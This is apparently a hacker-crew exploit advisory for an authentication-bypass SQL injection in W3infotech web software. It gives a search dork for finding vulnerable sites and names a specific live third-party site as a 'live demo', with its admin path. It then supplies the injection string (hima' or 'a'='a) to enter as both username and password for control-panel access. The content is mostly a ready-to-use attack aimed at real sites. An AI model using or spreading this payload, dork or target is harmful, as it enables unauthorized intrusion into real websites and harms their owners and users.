W3infotech suffers from a remote SQL injection vulnerability that allows for authentication bypass.
01ab51727bf20650b3e60a32cde842a6173b660c8f99728161c18a31b1439908
another exploit link : https://hell-z0ne.org/w3infotech.txt
[*]##############################################
[+] |____ViRuS_HiMa@YouR SyS__|__\ #
[+] |______________________|___||\*___ #
[+] |______________________|___||""|"*\___, #
[+] |______________________|___||""|*"|___|| #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
[+]====================================================================||
[*] About : W3infotech ( Auth Bypass ) SQL injection Vulnerability ||
[!] Site : https://www.w3infotech.com ||
[!] Author : ViRuS_HiMa ||
[!] Site : wWw.HeLL-z0ne.org ||
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM ||
[!] Location : Cairo-007 ||
[!]====================================================================||
[!] [H]eL[L] [Z]on[E] [C]re[W] ||
[!]====================================================================||
[!]
[!] Exploitation : ||
[!]
[!] you can use this dork : "Powered By W3infotech" ||
[!]
[!] Live demo : https://www.estad-aldoha.net ||
[!]
[!] Just add the admin path ,, so it will be : ||
[!]
[!] https://www.estad-aldoha.net/admin ||
[!]
[!] then auth bypass using this password : ||
[!]
[!] hima' or 'a'='a ||
[!]
[!] it mean that you have to type the same code in user and pass ||
[!]
[!] what you got ?? ,, you are in the script control panel now :p ||
[!]
[!]====================================================================||
[!] Greetz : Haxker & explit007 & Kasper-Ksa & All My Friends . ||
[*]====================================================================||
_________________________________________________________________
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.
https://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010